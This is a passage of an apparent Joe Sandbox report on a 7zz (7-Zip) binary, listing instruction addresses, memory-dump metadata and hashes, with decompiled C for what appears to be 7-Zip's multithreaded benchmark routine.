                                                                                                                                    0x004017b8
                                                                                                                                    0x004017bb
                                                                                                                                    0x004017bc
                                                                                                                                    0x004017c7
                                                                                                                                    0x004017c9
                                                                                                                                    0x004017cc
                                                                                                                                    0x004017cf
                                                                                                                                    0x004017d2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004017d2
                                                                                                                                    0x00000000
                                                                                                                                    0x004017a1
                                                                                                                                    0x00401877
                                                                                                                                    0x00000000
                                                                                                                                    0x00401877
                                                                                                                                    0x00000000
                                                                                                                                    0x0040177e
                                                                                                                                    0x004017f6
                                                                                                                                    0x004017f6
                                                                                                                                    0x004017fc
                                                                                                                                    0x004017fc
                                                                                                                                    0x00401808
                                                                                                                                    0x0040180b
                                                                                                                                    0x0040180d
                                                                                                                                    0x00401812
                                                                                                                                    0x00401813
                                                                                                                                    0x00401818
                                                                                                                                    0x0040181c
                                                                                                                                    0x0040181f
                                                                                                                                    0x00401821
                                                                                                                                    0x00401824
                                                                                                                                    0x0040182f
                                                                                                                                    0x00401836
                                                                                                                                    0x00401837
                                                                                                                                    0x0040183e
                                                                                                                                    0x0040183f
                                                                                                                                    0x00401842
                                                                                                                                    0x00401843
                                                                                                                                    0x00401848
                                                                                                                                    0x0040184b
                                                                                                                                    0x0040184b
                                                                                                                                    0x0040184b
                                                                                                                                    0x00401824
                                                                                                                                    0x0040184e
                                                                                                                                    0x00401853
                                                                                                                                    0x00401854
                                                                                                                                    0x0040185a
                                                                                                                                    0x00000000
                                                                                                                                    0x0040180b
                                                                                                                                    0x00401697
                                                                                                                                    0x00401699
                                                                                                                                    0x00401699
                                                                                                                                    0x00401866
                                                                                                                                    0x0040186c
                                                                                                                                    0x00401874

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040167E
                                                                                                                                      • Part of subcall function 00414B6B: __EH_prolog.LIBCMT ref: 00414B70
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: Avg:$ $ %5d$%2d: $CPU hardware threads:$size:
                                                                                                                                    • API String ID: 3519838083-1473790758
                                                                                                                                    • Opcode ID: f0c6b2568c83c33ba4f82c113691f84354128f9fe771813b118d120bbcbae2b5
                                                                                                                                    • Instruction ID: cf4bf7488a743daec15e4d6fa5ec6e5030c6436caeeb10ae79287eb816e5538f
                                                                                                                                    • Opcode Fuzzy Hash: f0c6b2568c83c33ba4f82c113691f84354128f9fe771813b118d120bbcbae2b5
                                                                                                                                    • Instruction Fuzzy Hash: 7851B472D00208ABDB10EF65DC41AAE77B5EF44364F20842FF854B72D1DB7D99818B99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00414269 Relevance: 12.5, APIs: 8, Instructions: 493COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                    			E00414269(unsigned int __ecx, signed int __edx) {
				void* __edi;
				signed int _t241;
				signed int _t242;
				signed int _t247;
				signed int _t249;
				intOrPtr* _t262;
				signed int _t269;
				intOrPtr* _t280;
				signed int _t281;
				intOrPtr* _t289;
				intOrPtr* _t292;
				intOrPtr _t294;
				signed int _t295;
				signed int _t303;
				signed int _t309;
				signed int _t314;
				signed int _t323;
				signed int _t324;
				signed int _t326;
				intOrPtr* _t327;
				unsigned int _t328;
				signed int _t383;
				signed int _t389;
				signed int _t391;
				signed int _t392;
				intOrPtr* _t393;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				void* _t401;
				intOrPtr _t404;
				signed int _t405;
				void* _t408;
				signed int _t409;
				intOrPtr* _t410;
				void* _t411;
				intOrPtr* _t422;

				_t378 = __edx;
				_t328 = __ecx;
				L0046B890(E00474718, _t411);
				_t241 = 1;
				 *(_t411 - 0x2c) = __edx;
				 *((intOrPtr*)(_t411 - 0x8c)) = __ecx;
				if(__ecx <= _t241) {
					_t389 = _t241;
				} else {
					_t389 = __ecx >> 1;
				}
				 *(_t411 - 0x1c) = _t389;
				 *(_t411 - 0x24) = (0 | _t328 - _t241 > 0x00000000) + 1;
				if(_t378 < 0x40000 || _t328 < _t241 || _t389 > 0x10000) {
					_t242 = 0x80070057;
				} else {
					_push(_t389);
					E00414920(_t411 - 0x18);
					_t398 =  *(_t411 - 0x18);
					 *(_t411 - 4) =  *(_t411 - 4) & 0x00000000;
					 *(_t411 - 0x10) =  *(_t411 - 0x10) & 0x00000000;
					_t323 = _t398;
					 *(_t411 - 0x20) = _t323;
					if(_t389 <= 0) {
						L17:
						 *(_t411 - 0x10) =  *(_t411 - 0x10) & 0x00000000;
						 *((intOrPtr*)(_t411 - 0x94)) = 0x159a55e5;
						_t430 = _t389;
						 *((intOrPtr*)(_t411 - 0x90)) = 0x1f123bb5;
						if(_t389 <= 0) {
							L36:
							L00467C60(_t411 - 0x50);
							 *(_t411 - 0x38) =  *(_t411 - 0x38) & 0x00000000;
							 *(_t411 - 0x10) =  *(_t411 - 0x10) & 0x00000000;
							 *(_t411 - 4) = 1;
							 *(_t411 - 0x34) = 1;
							if(_t389 <= 0) {
								L50:
								if(_t389 <= 1 || _t389 <= 0) {
									L54:
									_t399 = 0;
									if( *(_t411 - 0x38) == 0) {
										 *(_t411 - 0x58) = 0;
										L00413688( *((intOrPtr*)(_t323 + 0xc)) + 0x10, _t411 - 0x88);
										__eflags = _t389;
										 *((intOrPtr*)(_t411 - 0x68)) = 0;
										 *((intOrPtr*)(_t411 - 0x64)) = 0;
										 *((intOrPtr*)(_t411 - 0x60)) = 0;
										 *((intOrPtr*)(_t411 - 0x5c)) = 0;
										 *(_t411 - 0x58) = 1;
										if(_t389 <= 0) {
											L59:
											_t247 =  *((intOrPtr*)( *( *(_t411 + 8))))(_t411 - 0x88, 1);
											__eflags = _t247 - _t399;
											 *(_t411 - 0x2c) = _t247;
											if(_t247 == _t399) {
												 *(_t411 - 0x34) =  *(_t411 - 0x34) & 0x00000000;
												_t249 =  *(_t411 - 0x24) * _t389;
												__eflags = _t389 - _t399;
												 *(_t411 - 0x38) = _t399;
												 *(_t411 - 0x14) = _t249;
												 *(_t411 - 0x10) = _t399;
												if(_t389 <= _t399) {
													L78:
													__eflags = _t249 - 1;
													 *(_t411 - 0x14) = _t399;
													if(_t249 <= 1) {
														L94:
														_t400 =  *(_t411 - 0x38);
														__eflags = _t400;
														if(_t400 == 0) {
															L00413688( *((intOrPtr*)(_t323 + 0xc)) + 0x10, _t411 - 0x88);
															_t399 = 0;
															 *((intOrPtr*)(_t411 - 0x68)) = 0;
															 *((intOrPtr*)(_t411 - 0x64)) = 0;
															 *((intOrPtr*)(_t411 - 0x60)) = 0;
															 *((intOrPtr*)(_t411 - 0x5c)) = 0;
															__eflags = _t389;
															 *(_t411 - 0x58) =  *(_t323 + 0x1c) *  *(_t411 - 0x24);
															if(_t389 <= 0) {
																L101:
																_t391 =  *(_t411 + 8);
																_t324 =  *((intOrPtr*)( *_t391 + 4))(_t411 - 0x88, _t399);
																__eflags = _t324 - _t399;
																if(_t324 == _t399) {
																	_t392 =  *((intOrPtr*)( *_t391 + 4))(_t411 - 0x88, 1);
																	__eflags = _t392 - _t399;
																	_push(_t411 - 0x50);
																	if(_t392 == _t399) {
																		DeleteCriticalSection();
																		_t341 =  *(_t411 - 0x18);
																		 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
																		__eflags =  *(_t411 - 0x18) - _t399;
																		if( *(_t411 - 0x18) != _t399) {
																			E0041415B(_t341, _t392, _t411, 3);
																		}
																		_t242 = 0;
																		L113:
																		 *[fs:0x0] =  *((intOrPtr*)(_t411 - 0xc));
																		return _t242;
																	}
																	L106:
																	DeleteCriticalSection();
																	_t342 =  *(_t411 - 0x18);
																	 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
																	if( *(_t411 - 0x18) != _t399) {
																		E0041415B(_t342, _t392, _t411, 3);
																	}
																	_t242 = _t392;
																	goto L113;
																}
																DeleteCriticalSection(_t411 - 0x50);
																_t343 =  *(_t411 - 0x18);
																 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
																__eflags =  *(_t411 - 0x18) - _t399;
																if( *(_t411 - 0x18) != _t399) {
																	E0041415B(_t343, _t391, _t411, 3);
																}
																_t242 = _t324;
																goto L113;
															}
															_t262 = _t323 + 0x68;
															do {
																 *((intOrPtr*)(_t411 - 0x68)) =  *((intOrPtr*)(_t411 - 0x68)) +  *((intOrPtr*)(_t262 - 4));
																asm("adc [ebp-0x64], esi");
																 *((intOrPtr*)(_t411 - 0x60)) =  *((intOrPtr*)(_t411 - 0x60)) +  *_t262;
																asm("adc [ebp-0x5c], esi");
																_t262 = _t262 + 0x84;
																_t389 = _t389 - 1;
																__eflags = _t389;
															} while (_t389 != 0);
															goto L101;
														}
														L95:
														DeleteCriticalSection(_t411 - 0x50);
														_t346 =  *(_t411 - 0x18);
														 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
														__eflags =  *(_t411 - 0x18);
														if( *(_t411 - 0x18) != 0) {
															E0041415B(_t346, _t389, _t411, 3);
														}
														_t242 = _t400;
														goto L113;
													}
													__eflags = _t389;
													if(_t389 <= 0) {
														goto L94;
													}
													 *(_t411 - 0x20) = _t323;
													 *(_t411 - 0x1c) = _t389;
													do {
														__eflags =  *(_t411 - 0x24);
														if( *(_t411 - 0x24) <= 0) {
															goto L86;
														}
														_t401 = 0x4c;
														 *(_t411 - 0x28) =  *(_t411 - 0x24);
														do {
															L00467AC0( *((intOrPtr*)( *(_t411 - 0x20) + _t401 - 0x4c)));
															_t269 =  *( *(_t411 - 0x20) + _t401);
															__eflags = _t269;
															if(_t269 != 0) {
																 *(_t411 - 0x14) = _t269;
															}
															_t401 = _t401 + 4;
															_t185 = _t411 - 0x28;
															 *_t185 =  *(_t411 - 0x28) - 1;
															__eflags =  *_t185;
														} while ( *_t185 != 0);
														L86:
														 *(_t411 - 0x20) =  *(_t411 - 0x20) + 0x84;
														_t189 = _t411 - 0x1c;
														 *_t189 =  *(_t411 - 0x1c) - 1;
														__eflags =  *_t189;
													} while ( *_t189 != 0);
													__eflags =  *(_t411 - 0x14);
													if( *(_t411 - 0x14) == 0) {
														goto L94;
													}
													DeleteCriticalSection(_t411 - 0x50);
													_t348 =  *(_t411 - 0x18);
													 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
													__eflags =  *(_t411 - 0x18);
													if( *(_t411 - 0x18) != 0) {
														E0041415B(_t348, _t389, _t411, 3);
													}
													_t242 =  *(_t411 - 0x14);
													goto L113;
												} else {
													goto L64;
												}
												do {
													L64:
													_t404 =  *(_t411 - 0x10) * 0x84 +  *(_t411 - 0x20);
													_t389 = 0;
													_t383 = 0x4000000 %  *(_t404 + 0x64);
													__eflags =  *(_t411 - 0x10);
													 *((intOrPtr*)(_t404 + 0x1c)) = 0x4000000 /  *(_t404 + 0x64) + 2;
													if( *(_t411 - 0x10) == 0) {
														 *( *((intOrPtr*)(_t404 + 0xc)) + 0x4c) =  *(_t411 + 8);
														 *( *((intOrPtr*)(_t404 + 0xc)) + 0x40) =  *(_t411 - 0x14);
														__eflags =  *((intOrPtr*)(_t404 + 0xc)) + 0x10;
														E00414885( *((intOrPtr*)(_t404 + 0xc)) + 0x10, _t383);
													}
													__eflags =  *(_t411 - 0x14) - 1;
													if( *(_t411 - 0x14) <= 1) {
														_push(_t389);
														_t400 = L00413EF3(_t404);
														__eflags = _t400 - _t389;
														if(_t400 != _t389) {
															goto L95;
														}
													} else {
														__eflags =  *(_t411 - 0x24) - _t389;
														if( *(_t411 - 0x24) <= _t389) {
															goto L76;
														}
														_t326 =  *(_t411 - 0x10) *  *(_t411 - 0x24);
														__eflags = _t326;
														while(1) {
															__eflags =  *(_t411 - 0x10);
															if( *(_t411 - 0x10) == 0) {
																__eflags = _t389;
																if(_t389 == 0) {
																	_push(1);
																	_pop(0);
																}
															}
															_t280 = (_t389 << 4) + _t404 + 0x24;
															 *(_t280 + 8) = (_t326 + _t389) * 0x00000150 & 0x000007ff;
															 *((char*)(_t280 + 0xc)) = 0;
															 *(_t280 + 4) = _t389;
															 *_t280 = _t404;
															_t281 = E00467AD0(_t404 + _t389 * 4, E004148ED, _t280);
															__eflags = _t281;
															 *(_t411 - 0x2c) = _t281;
															if(_t281 != 0) {
																break;
															}
															_t389 = _t389 + 1;
															__eflags = _t389 -  *(_t411 - 0x24);
															if(_t389 <  *(_t411 - 0x24)) {
																continue;
															}
															goto L76;
														}
														DeleteCriticalSection(_t411 - 0x50);
														_t352 =  *(_t411 - 0x18);
														 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
														__eflags =  *(_t411 - 0x18);
														if( *(_t411 - 0x18) != 0) {
															E0041415B(_t352, _t389, _t411, 3);
														}
														_t242 =  *(_t411 - 0x2c);
														goto L113;
													}
													L76:
													 *(_t411 - 0x10) =  *(_t411 - 0x10) + 1;
													__eflags =  *(_t411 - 0x10) -  *(_t411 - 0x1c);
												} while ( *(_t411 - 0x10) <  *(_t411 - 0x1c));
												_t323 =  *(_t411 - 0x20);
												_t249 =  *(_t411 - 0x14);
												_t389 =  *(_t411 - 0x1c);
												_t399 = 0;
												__eflags = 0;
												goto L78;
											}
											DeleteCriticalSection(_t411 - 0x50);
											_t357 =  *(_t411 - 0x18);
											 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
											__eflags =  *(_t411 - 0x18) - _t399;
											if( *(_t411 - 0x18) != _t399) {
												E0041415B(_t357, _t389, _t411, 3);
											}
											_t242 =  *(_t411 - 0x2c);
											goto L113;
										}
										_t289 = _t323 + 0x68;
										 *(_t411 - 0x14) = _t389;
										do {
											 *((intOrPtr*)(_t411 - 0x68)) =  *((intOrPtr*)(_t411 - 0x68)) +  *((intOrPtr*)(_t289 - 4));
											asm("adc [ebp-0x64], esi");
											 *((intOrPtr*)(_t411 - 0x60)) =  *((intOrPtr*)(_t411 - 0x60)) +  *_t289;
											asm("adc [ebp-0x5c], esi");
											_t289 = _t289 + 0x84;
											_t118 = _t411 - 0x14;
											 *_t118 =  *(_t411 - 0x14) - 1;
											__eflags =  *_t118;
										} while ( *_t118 != 0);
										goto L59;
									}
									_t392 =  *(_t411 - 0x38);
									_push(_t411 - 0x50);
									goto L106;
								} else {
									_t405 = _t323;
									 *(_t411 - 0x14) = _t389;
									do {
										L00467AC0( *_t405);
										_t405 = _t405 + 0x84;
										_t98 = _t411 - 0x14;
										 *_t98 =  *(_t411 - 0x14) - 1;
									} while ( *_t98 != 0);
									goto L54;
								}
							} else {
								goto L37;
							}
							do {
								L37:
								 *(_t411 - 0x14) = 2;
								_t408 =  *(_t411 - 0x10) * 0x84 +  *(_t411 - 0x20);
								_t393 = _t408 + 0xc;
								_t327 = _t393;
								do {
									_push(0x50);
									_t292 = L004079F2();
									if(_t292 == 0) {
										_t292 = 0;
										__eflags = 0;
									} else {
										 *((intOrPtr*)(_t292 + 4)) = 0;
										 *((intOrPtr*)(_t292 + 0x40)) = 0;
										 *((intOrPtr*)(_t292 + 0x4c)) = 0;
										 *_t292 = 0x47aaf4;
									}
									 *_t327 = _t292;
									E0040C9B4(_t327 + 8, _t292);
									_t294 =  *_t327;
									_t327 = _t327 + 4;
									_t81 = _t411 - 0x14;
									 *_t81 =  *(_t411 - 0x14) - 1;
									 *((intOrPtr*)(_t294 + 8)) = _t411 - 0x50;
								} while ( *_t81 != 0);
								if( *(_t411 - 0x10) == 0) {
									 *( *_t393 + 0x4c) =  *(_t411 + 8);
									 *( *_t393 + 0x40) =  *(_t411 - 0x1c);
									E00414885( *_t393 + 0x10, _t378);
								}
								_t389 =  *(_t411 - 0x1c);
								if(_t389 <= 1) {
									_t295 = L00413E35(_t408);
								} else {
									_t378 = E004148B5;
									 *(_t408 + 0x20) =  *(_t411 - 0x10) * 0x00000150 & 0x000007ff;
									_t295 = E00467AD0(_t408, E004148B5, _t408);
								}
								_t400 = _t295;
								if(_t400 != 0) {
									goto L95;
								}
								 *(_t411 - 0x10) =  *(_t411 - 0x10) + 1;
							} while ( *(_t411 - 0x10) < _t389);
							_t323 =  *(_t411 - 0x20);
							_t389 =  *(_t411 - 0x1c);
							goto L50;
						}
						_t409 = _t323;
						while(1) {
							_push(_t411 - 0x94);
							_push( *((intOrPtr*)(_t411 - 0x8c)));
							_push( *(_t411 - 0x2c));
							_t303 = L00413A0D(_t409, _t430);
							 *(_t411 - 0x30) = _t303;
							if(_t303 != 0) {
								break;
							}
							 *(_t411 - 0x10) =  *(_t411 - 0x10) + 1;
							_t409 = _t409 + 0x84;
							if( *(_t411 - 0x10) < _t389) {
								continue;
							}
							goto L36;
						}
						_t372 =  *(_t411 - 0x18);
						 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
						__eflags =  *(_t411 - 0x18);
						if( *(_t411 - 0x18) != 0) {
							E0041415B(_t372, _t389, _t411, 3);
						}
						_t242 =  *(_t411 - 0x30);
						goto L113;
					}
					_t410 = _t398 + 8;
					_t422 = _t410;
					while(1) {
						_push(0);
						asm("sbb eax, eax");
						_t378 = 1;
						_push(0x30101);
						 *(_t410 + 0x54) =  !( ~( *(_t411 - 0x10))) &  *(_t411 + 8);
						_t309 = E0040C964(_t410, 1, _t422);
						 *(_t411 - 0x14) = _t309;
						if(_t309 != 0) {
							break;
						}
						if( *_t410 == _t309) {
							_t375 =  *(_t411 - 0x18);
							 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
							__eflags =  *(_t411 - 0x18) - _t309;
							L30:
							if(__eflags != 0) {
								E0041415B(_t375, 0x30101, _t411, 3);
							}
							_t242 = 0x80004001;
							goto L113;
						}
						_t425 =  *(_t411 - 0x24) - _t309;
						 *(_t411 - 0x14) = _t309;
						if( *(_t411 - 0x24) <= _t309) {
							L15:
							 *(_t411 - 0x10) =  *(_t411 - 0x10) + 1;
							_t410 = _t410 + 0x84;
							if( *(_t411 - 0x10) <  *(_t411 - 0x1c)) {
								continue;
							}
							_t389 =  *(_t411 - 0x1c);
							goto L17;
						}
						 *(_t411 - 0x28) = _t410 + 0x3c;
						while(1) {
							_push(0);
							_t378 = 0;
							_push(0x30101);
							_t314 = E0040C964( *(_t411 - 0x28), 0, _t425);
							 *(_t411 - 0x30) = _t314;
							if(_t314 != 0) {
								break;
							}
							if( *( *(_t411 - 0x28)) == 0) {
								_t375 =  *(_t411 - 0x18);
								 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
								__eflags =  *(_t411 - 0x18);
								goto L30;
							}
							 *(_t411 - 0x14) =  *(_t411 - 0x14) + 1;
							 *(_t411 - 0x28) =  *(_t411 - 0x28) + 4;
							if( *(_t411 - 0x14) <  *(_t411 - 0x24)) {
								continue;
							}
							goto L15;
						}
						_t377 =  *(_t411 - 0x18);
						 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
						__eflags =  *(_t411 - 0x18);
						if( *(_t411 - 0x18) != 0) {
							E0041415B(_t377, 0x30101, _t411, 3);
						}
						_t242 =  *(_t411 - 0x30);
						goto L113;
					}
					_t374 =  *(_t411 - 0x18);
					 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
					__eflags =  *(_t411 - 0x18);
					if( *(_t411 - 0x18) != 0) {
						E0041415B(_t374, 0x30101, _t411, 3);
					}
					_t242 =  *(_t411 - 0x14);
				}
			}








































                                                                                                                                    0x00414269
                                                                                                                                    0x00414269
                                                                                                                                    0x0041426e
                                                                                                                                    0x0041427e
                                                                                                                                    0x0041427f
                                                                                                                                    0x00414284
                                                                                                                                    0x0041428a
                                                                                                                                    0x00414292
                                                                                                                                    0x0041428c
                                                                                                                                    0x0041428e
                                                                                                                                    0x0041428e
                                                                                                                                    0x004142a2
                                                                                                                                    0x004142a5
                                                                                                                                    0x004142a8
                                                                                                                                    0x00414857
                                                                                                                                    0x004142c2
                                                                                                                                    0x004142c2
                                                                                                                                    0x004142c6
                                                                                                                                    0x004142cb
                                                                                                                                    0x004142ce
                                                                                                                                    0x004142d2
                                                                                                                                    0x004142d6
                                                                                                                                    0x004142da
                                                                                                                                    0x004142dd
                                                                                                                                    0x0041436e
                                                                                                                                    0x0041436e
                                                                                                                                    0x00414372
                                                                                                                                    0x0041437c
                                                                                                                                    0x0041437e
                                                                                                                                    0x00414388
                                                                                                                                    0x00414433
                                                                                                                                    0x00414436
                                                                                                                                    0x0041443b
                                                                                                                                    0x0041443f
                                                                                                                                    0x00414445
                                                                                                                                    0x00414449
                                                                                                                                    0x0041444d
                                                                                                                                    0x00414512
                                                                                                                                    0x00414515
                                                                                                                                    0x00414532
                                                                                                                                    0x00414532
                                                                                                                                    0x00414537
                                                                                                                                    0x00414545
                                                                                                                                    0x00414554
                                                                                                                                    0x00414559
                                                                                                                                    0x0041455b
                                                                                                                                    0x0041455e
                                                                                                                                    0x00414561
                                                                                                                                    0x00414564
                                                                                                                                    0x00414567
                                                                                                                                    0x0041456e
                                                                                                                                    0x00414591
                                                                                                                                    0x0041459f
                                                                                                                                    0x004145a1
                                                                                                                                    0x004145a3
                                                                                                                                    0x004145a6
                                                                                                                                    0x004145cf
                                                                                                                                    0x004145d3
                                                                                                                                    0x004145d6
                                                                                                                                    0x004145d8
                                                                                                                                    0x004145db
                                                                                                                                    0x004145de
                                                                                                                                    0x004145e1
                                                                                                                                    0x004146b6
                                                                                                                                    0x004146b6
                                                                                                                                    0x004146b9
                                                                                                                                    0x004146bc
                                                                                                                                    0x0041475a
                                                                                                                                    0x0041475a
                                                                                                                                    0x0041475d
                                                                                                                                    0x0041475f
                                                                                                                                    0x00414790
                                                                                                                                    0x00414795
                                                                                                                                    0x00414797
                                                                                                                                    0x0041479a
                                                                                                                                    0x0041479d
                                                                                                                                    0x004147a0
                                                                                                                                    0x004147aa
                                                                                                                                    0x004147ac
                                                                                                                                    0x004147af
                                                                                                                                    0x004147cd
                                                                                                                                    0x004147cd
                                                                                                                                    0x004147df
                                                                                                                                    0x004147e1
                                                                                                                                    0x004147e3
                                                                                                                                    0x00414815
                                                                                                                                    0x0041481a
                                                                                                                                    0x0041481c
                                                                                                                                    0x0041481d
                                                                                                                                    0x0041483b
                                                                                                                                    0x00414841
                                                                                                                                    0x00414844
                                                                                                                                    0x00414848
                                                                                                                                    0x0041484a
                                                                                                                                    0x0041484e
                                                                                                                                    0x0041484e
                                                                                                                                    0x00414853
                                                                                                                                    0x0041485c
                                                                                                                                    0x00414862
                                                                                                                                    0x0041486a
                                                                                                                                    0x0041486a
                                                                                                                                    0x0041481f
                                                                                                                                    0x0041481f
                                                                                                                                    0x00414825
                                                                                                                                    0x00414828
                                                                                                                                    0x0041482e
                                                                                                                                    0x00414832
                                                                                                                                    0x00414832
                                                                                                                                    0x00414837
                                                                                                                                    0x00000000
                                                                                                                                    0x00414837
                                                                                                                                    0x004147e9
                                                                                                                                    0x004147ef
                                                                                                                                    0x004147f2
                                                                                                                                    0x004147f6
                                                                                                                                    0x004147f8
                                                                                                                                    0x004147fc
                                                                                                                                    0x004147fc
                                                                                                                                    0x00414801
                                                                                                                                    0x00000000
                                                                                                                                    0x00414801
                                                                                                                                    0x004147b1
                                                                                                                                    0x004147b4
                                                                                                                                    0x004147b7
                                                                                                                                    0x004147ba
                                                                                                                                    0x004147bf
                                                                                                                                    0x004147c2
                                                                                                                                    0x004147c5
                                                                                                                                    0x004147ca
                                                                                                                                    0x004147ca
                                                                                                                                    0x004147ca
                                                                                                                                    0x00000000
                                                                                                                                    0x004147b4
                                                                                                                                    0x00414761
                                                                                                                                    0x00414765
                                                                                                                                    0x0041476b
                                                                                                                                    0x0041476e
                                                                                                                                    0x00414772
                                                                                                                                    0x00414774
                                                                                                                                    0x00414778
                                                                                                                                    0x00414778
                                                                                                                                    0x0041477d
                                                                                                                                    0x00000000
                                                                                                                                    0x0041477d
                                                                                                                                    0x004146c2
                                                                                                                                    0x004146c4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004146ca
                                                                                                                                    0x004146cd
                                                                                                                                    0x004146d0
                                                                                                                                    0x004146d0
                                                                                                                                    0x004146d4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004146db
                                                                                                                                    0x004146dc
                                                                                                                                    0x004146df
                                                                                                                                    0x004146e6
                                                                                                                                    0x004146ee
                                                                                                                                    0x004146f1
                                                                                                                                    0x004146f3
                                                                                                                                    0x004146f5
                                                                                                                                    0x004146f5
                                                                                                                                    0x004146f8
                                                                                                                                    0x004146fb
                                                                                                                                    0x004146fb
                                                                                                                                    0x004146fb
                                                                                                                                    0x004146fb
                                                                                                                                    0x00414700
                                                                                                                                    0x00414700
                                                                                                                                    0x00414707
                                                                                                                                    0x00414707
                                                                                                                                    0x00414707
                                                                                                                                    0x00414707
                                                                                                                                    0x0041470c
                                                                                                                                    0x00414710
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00414716
                                                                                                                                    0x0041471c
                                                                                                                                    0x0041471f
                                                                                                                                    0x00414723
                                                                                                                                    0x00414725
                                                                                                                                    0x00414729
                                                                                                                                    0x00414729
                                                                                                                                    0x0041472e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004145e7
                                                                                                                                    0x004145e7
                                                                                                                                    0x004145f5
                                                                                                                                    0x004145fa
                                                                                                                                    0x004145fc
                                                                                                                                    0x00414601
                                                                                                                                    0x00414604
                                                                                                                                    0x00414607
                                                                                                                                    0x0041460f
                                                                                                                                    0x00414618
                                                                                                                                    0x0041461e
                                                                                                                                    0x00414621
                                                                                                                                    0x00414621
                                                                                                                                    0x00414626
                                                                                                                                    0x0041462a
                                                                                                                                    0x0041468a
                                                                                                                                    0x00414692
                                                                                                                                    0x00414694
                                                                                                                                    0x00414696
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0041462c
                                                                                                                                    0x0041462c
                                                                                                                                    0x0041462f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00414634
                                                                                                                                    0x00414634
                                                                                                                                    0x00414638
                                                                                                                                    0x0041463a
                                                                                                                                    0x0041463d
                                                                                                                                    0x0041463f
                                                                                                                                    0x00414641
                                                                                                                                    0x00414643
                                                                                                                                    0x00414645
                                                                                                                                    0x00414645
                                                                                                                                    0x00414641
                                                                                                                                    0x0041465a
                                                                                                                                    0x0041465f
                                                                                                                                    0x00414662
                                                                                                                                    0x0041466d
                                                                                                                                    0x00414670
                                                                                                                                    0x00414672
                                                                                                                                    0x00414677
                                                                                                                                    0x00414679
                                                                                                                                    0x0041467c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00414682
                                                                                                                                    0x00414683
                                                                                                                                    0x00414686
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00414688
                                                                                                                                    0x0041473a
                                                                                                                                    0x00414740
                                                                                                                                    0x00414743
                                                                                                                                    0x00414747
                                                                                                                                    0x00414749
                                                                                                                                    0x0041474d
                                                                                                                                    0x0041474d
                                                                                                                                    0x00414752
                                                                                                                                    0x00000000
                                                                                                                                    0x00414752
                                                                                                                                    0x0041469c
                                                                                                                                    0x0041469c
                                                                                                                                    0x004146a2
                                                                                                                                    0x004146a2
                                                                                                                                    0x004146ab
                                                                                                                                    0x004146ae
                                                                                                                                    0x004146b1
                                                                                                                                    0x004146b4
                                                                                                                                    0x004146b4
                                                                                                                                    0x00000000
                                                                                                                                    0x004146b4
                                                                                                                                    0x004145ac
                                                                                                                                    0x004145b2
                                                                                                                                    0x004145b5
                                                                                                                                    0x004145b9
                                                                                                                                    0x004145bb
                                                                                                                                    0x004145bf
                                                                                                                                    0x004145bf
                                                                                                                                    0x004145c4
                                                                                                                                    0x00000000
                                                                                                                                    0x004145c4
                                                                                                                                    0x00414570
                                                                                                                                    0x00414573
                                                                                                                                    0x00414576
                                                                                                                                    0x00414579
                                                                                                                                    0x0041457c
                                                                                                                                    0x00414581
                                                                                                                                    0x00414584
                                                                                                                                    0x00414587
                                                                                                                                    0x0041458c
                                                                                                                                    0x0041458c
                                                                                                                                    0x0041458c
                                                                                                                                    0x0041458c
                                                                                                                                    0x00000000
                                                                                                                                    0x00414576
                                                                                                                                    0x00414539
                                                                                                                                    0x0041453f
                                                                                                                                    0x00000000
